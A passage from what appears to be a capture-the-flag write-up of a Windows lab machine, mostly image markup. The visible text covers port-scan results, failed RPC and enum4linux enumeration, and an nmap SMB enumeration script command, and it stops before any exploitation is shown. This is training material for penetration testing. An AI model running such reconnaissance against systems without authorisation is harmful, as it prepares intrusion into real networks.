https://substackcdn.com/image/fetch/$s_!GrZi!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1680983b-bb52-40cd-9e1f-3ee1583af63e_800x629.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!GrZi!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1680983b-bb52-40cd-9e1f-3ee1583af63e_800x629.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/1680983b-bb52-40cd-9e1f-3ee1583af63e_800x629.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!GrZi!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1680983b-bb52-40cd-9e1f-3ee1583af63e_800x629.png 424w, https://substackcdn.com/image/fetch/$s_!GrZi!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1680983b-bb52-40cd-9e1f-3ee1583af63e_800x629.png 848w, https://substackcdn.com/image/fetch/$s_!GrZi!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1680983b-bb52-40cd-9e1f-3ee1583af63e_800x629.png 1272w, https://substackcdn.com/image/fetch/$s_!GrZi!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1680983b-bb52-40cd-9e1f-3ee1583af63e_800x629.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>That gave some service versions.</p><blockquote><p><em>135/tcp: Microsoft Windows RPC<br>139/tcp: Microsoft Windows netbios-ssn<br>445/tcp: Microsoft Windows 7&#8211;10 microsoft-ds (Workgroup: workgroup)<br>49152/tcp: unknown<br>49153/tcp: unknown<br>49154/tcp: Microsoft Windows RPC<br>49155/tcp: Microsoft Windows RPC<br>49156/tcp: Microsoft Windows RPC<br>49157/tcp: Microsoft Windows RPC</em></p></blockquote><p>Ignoring the hint in the hostname, let&#8217;s see if there is any manual enumeration via RPC.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!sboK!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7def39b2-ef00-417c-909f-e9da1ce7dce3_791x98.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!sboK!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7def39b2-ef00-417c-909f-e9da1ce7dce3_791x98.png 424w, https://substackcdn.com/image/fetch/$s_!sboK!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7def39b2-ef00-417c-909f-e9da1ce7dce3_791x98.png 848w, https://substackcdn.com/image/fetch/$s_!sboK!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7def39b2-ef00-417c-909f-e9da1ce7dce3_791x98.png 1272w, https://substackcdn.com/image/fetch/$s_!sboK!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7def39b2-ef00-417c-909f-e9da1ce7dce3_791x98.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!sboK!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7def39b2-ef00-417c-909f-e9da1ce7dce3_791x98.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/7def39b2-ef00-417c-909f-e9da1ce7dce3_791x98.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!sboK!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7def39b2-ef00-417c-909f-e9da1ce7dce3_791x98.png 424w, https://substackcdn.com/image/fetch/$s_!sboK!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7def39b2-ef00-417c-909f-e9da1ce7dce3_791x98.png 848w, https://substackcdn.com/image/fetch/$s_!sboK!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7def39b2-ef00-417c-909f-e9da1ce7dce3_791x98.png 1272w, https://substackcdn.com/image/fetch/$s_!sboK!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7def39b2-ef00-417c-909f-e9da1ce7dce3_791x98.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Nope! Let&#8217;s check SMB.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!kL2_!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcfc879a8-c781-48ab-bc54-50c1647b18eb_800x223.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!kL2_!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcfc879a8-c781-48ab-bc54-50c1647b18eb_800x223.png 424w, https://substackcdn.com/image/fetch/$s_!kL2_!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcfc879a8-c781-48ab-bc54-50c1647b18eb_800x223.png 848w, https://substackcdn.com/image/fetch/$s_!kL2_!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcfc879a8-c781-48ab-bc54-50c1647b18eb_800x223.png 1272w, https://substackcdn.com/image/fetch/$s_!kL2_!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcfc879a8-c781-48ab-bc54-50c1647b18eb_800x223.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!kL2_!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcfc879a8-c781-48ab-bc54-50c1647b18eb_800x223.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/cfc879a8-c781-48ab-bc54-50c1647b18eb_800x223.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!kL2_!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcfc879a8-c781-48ab-bc54-50c1647b18eb_800x223.png 424w, https://substackcdn.com/image/fetch/$s_!kL2_!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcfc879a8-c781-48ab-bc54-50c1647b18eb_800x223.png 848w, https://substackcdn.com/image/fetch/$s_!kL2_!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcfc879a8-c781-48ab-bc54-50c1647b18eb_800x223.png 1272w, https://substackcdn.com/image/fetch/$s_!kL2_!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcfc879a8-c781-48ab-bc54-50c1647b18eb_800x223.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Let&#8217;s see if we can get anything from enum4linux, nada.</p><h3>Methodology</h3><blockquote><p><em>Reiterated port scan and enumeration information:<br>135/tcp: Microsoft Windows RPC<br>139/tcp: Microsoft Windows netbios-ssn<br>445/tcp: Microsoft Windows 7&#8211;10 microsoft-ds (Workgroup: workgroup)<br>49152/tcp: unknown<br>49153/tcp: unknown<br>49154/tcp: Microsoft Windows RPC<br>49155/tcp: Microsoft Windows RPC<br>49156/tcp: Microsoft Windows RPC<br>49157/tcp: Microsoft Windows RPC</em></p></blockquote><p>Now, we can see from our enumeration that RPC seems to be a no-go. Let&#8217;s have a look at what nmap can find for RPC and SMB.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!KJHM!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2f234cda-7108-4dd3-af12-155cc9e7c7ed_800x419.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!KJHM!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2f234cda-7108-4dd3-af12-155cc9e7c7ed_800x419.png 424w, https://substackcdn.com/image/fetch/$s_!KJHM!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2f234cda-7108-4dd3-af12-155cc9e7c7ed_800x419.png 848w, https://substackcdn.com/image/fetch/$s_!KJHM!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2f234cda-7108-4dd3-af12-155cc9e7c7ed_800x419.png 1272w, https://substackcdn.com/image/fetch/$s_!KJHM!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2f234cda-7108-4dd3-af12-155cc9e7c7ed_800x419.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!KJHM!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2f234cda-7108-4dd3-af12-155cc9e7c7ed_800x419.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/2f234cda-7108-4dd3-af12-155cc9e7c7ed_800x419.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!KJHM!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2f234cda-7108-4dd3-af12-155cc9e7c7ed_800x419.png 424w, https://substackcdn.com/image/fetch/$s_!KJHM!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2f234cda-7108-4dd3-af12-155cc9e7c7ed_800x419.png 848w, https://substackcdn.com/image/fetch/$s_!KJHM!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2f234cda-7108-4dd3-af12-155cc9e7c7ed_800x419.png 1272w, https://substackcdn.com/image/fetch/$s_!KJHM!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2f234cda-7108-4dd3-af12-155cc9e7c7ed_800x419.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>RPC is continuing to give us jack and squat. Let&#8217;s see what we can do with SMB.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!upfJ!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F63b15e2f-2a4e-4717-8bb0-8607aa29987e_800x711.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!upfJ!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F63b15e2f-2a4e-4717-8bb0-8607aa29987e_800x711.png 424w, https://substackcdn.com/image/fetch/$s_!upfJ!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F63b15e2f-2a4e-4717-8bb0-8607aa29987e_800x711.png 848w, https://substackcdn.com/image/fetch/$s_!upfJ!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F63b15e2f-2a4e-4717-8bb0-8607aa29987e_800x711.png 1272w, https://substackcdn.com/image/fetch/$s_!upfJ!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F63b15e2f-2a4e-4717-8bb0-8607aa29987e_800x711.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!upfJ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F63b15e2f-2a4e-4717-8bb0-8607aa29987e_800x711.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/63b15e2f-2a4e-4717-8bb0-8607aa29987e_800x711.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!upfJ!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F63b15e2f-2a4e-4717-8bb0-8607aa29987e_800x711.png 424w, https://substackcdn.com/image/fetch/$s_!upfJ!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F63b15e2f-2a4e-4717-8bb0-8607aa29987e_800x711.png 848w, https://substackcdn.com/image/fetch/$s_!upfJ!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F63b15e2f-2a4e-4717-8bb0-8607aa29987e_800x711.png 1272w, https://substackcdn.com/image/fetch/$s_!upfJ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F63b15e2f-2a4e-4717-8bb0-8607aa29987e_800x711.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Being a little lazy, I used <em>nmap -p139,445 --script=smb-enum-*</em></p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!RVTk!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9354e6be-9d7f-41cd-b9c8-a761441baa2c_800x708.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!RVTk!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9354e6be-9d7f-41cd-b9c8-a761441baa2c_800x708.png 424w, https://substackcdn.com/image/fetch/$s_!RVTk!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9354e6be-9d7f-41cd-b9c8-a761441baa2c_800x708.png 848w, https://substackcdn.com/image/fetch/$s_!RVTk!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9354e6be-9d7f-41cd-b9c8-a761441baa2c_800x708.png 1272w, https://substackcdn.com/image/fetch/$s_!RVTk!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9354e6be-9d7f-41cd-b9c8-a761441baa2c_800x708.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!RVTk!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9354e6be-9d7f-41cd-b9c8-a761441baa2c_800x708.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/9354e6be-9d7f-41cd-b9c8-a761441baa2c_800x708.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!RVTk!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9354e6be-9d7f-41cd-b9c8-a761441baa2c_800x708.png 424w, https://substackcdn.com/image/fetch/$s_!RVTk!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9354e6be-9d7f-41cd-b9c8-a761441baa2c_800x708.png 848w, https://substackcdn.com/image/fetch/$s_!RVTk!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9354e6be-9d7f-41cd-b9c8-a761441baa2c_800x708.png 1272w, https://substackcdn.com/image/fetch/$s_!RVTk!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9354e6be-9d7f-41cd-b9c8-a761441baa2c_800x708.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!83SR!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe27ea3fd-df47-4aff-8bb5-5189a539ec1f_800x226.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!83SR!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe27ea3fd-df47-4aff-8bb5-5189a539ec1f_800x226.png 424w, https://substackcdn.com/image/fetch/$s_!83SR!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe27ea3fd-df47-4aff-8bb5-5189a539ec1f_800x226.png 848w, https://substackcdn.com/image/fetch/$s_!83SR!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe27ea3fd-df47-4aff-8bb5-5189a539ec1f_800x226.png 1272w, https://substackcdn.com/image/fetch/$s_!83SR!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe27ea3fd-df47-4aff-8bb5-5189a539ec1f_800x226.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!83SR!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe27ea3fd-df47-4aff-8bb5-5189a539ec1f_800x226.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/e27ea3fd-df47-4aff-8bb5-5189a539ec1f_800x226.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!83SR!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe27ea3fd-df47-4aff-8bb5-5189a539ec1f_800x226.png 424w, https://substackcdn.com/image/fetch/$s_!83SR!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe27ea3fd-df47-4aff-8bb5-5189a539ec1f_800x226.png 848w, https://substackcdn.com/image/fetch/$s_!83SR!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe27ea3fd-df47-4aff-8bb5-5189a539ec1f_800x226.png 1272w, https://substackcdn.com/image/fetch/$s_!83SR!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe27ea3fd-df47-4aff-8bb5-5189a539ec1f_800x226.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Let&#8217;s be punny, take the bait for the hostname hint, and put on our Blue Suede Shoes.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!x-bd!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F550faa0f-fbb1-4a73-950b-3b011367bd4b_800x65.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" 